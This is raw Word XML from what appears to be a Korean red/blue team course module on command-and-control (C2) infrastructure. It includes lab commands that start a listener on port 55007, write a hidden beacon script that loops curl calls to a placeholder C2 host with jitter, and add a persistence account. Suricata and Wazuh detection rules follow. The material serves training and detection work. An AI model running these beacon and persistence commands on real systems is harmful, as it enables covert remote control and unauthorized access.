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W7] C2 인프라 — 비콘·리다이렉터·은닉 vs C2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7주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>C2 인프라 구축·운영</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 리스너·비콘·리다이렉터·도메인 프론팅·Malleable 프로파일·</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>지터(jitter) 등으로 지휘통제 채널을 만들고 은닉한다. Red 는 C2 를 운영하고, Blue 는 JA3/비콘/이상행위로 탐지한다.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대상 호스트에 C2 리스너(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>포트 55007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)와 주기 비콘(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa07beacon`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)을 심고, 지터로 탐지를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>회피한다. 방어자는 비표준 포트 C2 와 비콘 주기성을 탐지한다.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C2 운영(자기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 C2 를 구축,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C2 리스너 포트 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>55007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 비콘 스크립트 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa07beacon`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aa07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`atka07`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9707011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103071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[C2 리스너] — HTTPS 흉내 리스너 구축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대상 호스트에 정상 HTTPS 를 흉내내는 C2 리스너 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>포트 55007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 구축한다(개념: 자체 서명 인증서로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>암호화된 채널). 이 포트가 지휘통제 채널이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55007 &gt;/dev/null 2&gt;&amp;1 &amp;     # C2 리스너 (또는 openssl s_server / python)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포트 55007 이 listening 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55007 이 listening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[비콘 + 지속성] — 주기 체크인 비콘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C2 의 본체는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>비콘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">이다. 주기적으로 C2 에 체크인하는 비콘 스크립트 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa07beacon`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aa07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맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">심고(지터로 주기 변형), 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`atka07`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 으로 지속성을 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cat &gt; /tmp/.aa07beacon &lt;&lt;'SH'</w:t>
        <w:br/>
        <w:t>#!/bin/bash</w:t>
        <w:br/>
        <w:t># aa07 beacon: 5s +- jitter 체크인</w:t>
        <w:br/>
        <w:t>while true; do curl -s http://C2/checkin &gt;/dev/null 2&gt;&amp;1; sleep $((4 + RANDOM % 4)); done</w:t>
        <w:br/>
        <w:t>SH</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash atka07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/tmp/.aa07beacon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aa07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atka07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/tmp/.aa07beacon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aa07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atka07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[C2 포트 탐지] — Suricata 룰 (sid 9707011)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비표준 포트 C2(55007) 트래픽을 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9707011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)을 만든다(개념적으로는 JA3/SNI 핑거프린팅과 병행).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55007 (msg:"ATKADV-W07 C2 listener port 55007"; flow:to_server; sid:9707011;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9707011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C2 포트(55007)를 보는 sid 9707011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[비콘/C2 탐지] — Wazuh 룰 (id 103071)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비콘 스크립트·C2 지속성을 잡는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 103071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name="edu,c2,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="103071" level="13"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;atka07&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;ATKADV-W07 - C2 beacon / persistence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103071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비콘/C2 지표를 보는 id 103071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[C2 탐지 기법 분석] — JA3·비콘·지터 + 헌팅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C2 탐지를 방어자 관점에서 종합한다. JA3/JA3S 핑거프린팅, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>비콘 주기성</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(통신 간격 표준편차), 지터에도</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>드러나는 패턴, 도메인 프론팅 탐지 한계를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C2 탐지 기법(JA3/JA3S, 비콘 주기성 분석, DNS C2 탐지)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C2 리스너(55007)·비콘(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.aa07beacon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(atka07) 헌팅 결과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C2 탐지 기법/헌팅으로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C2 탐지 기법·헌팅은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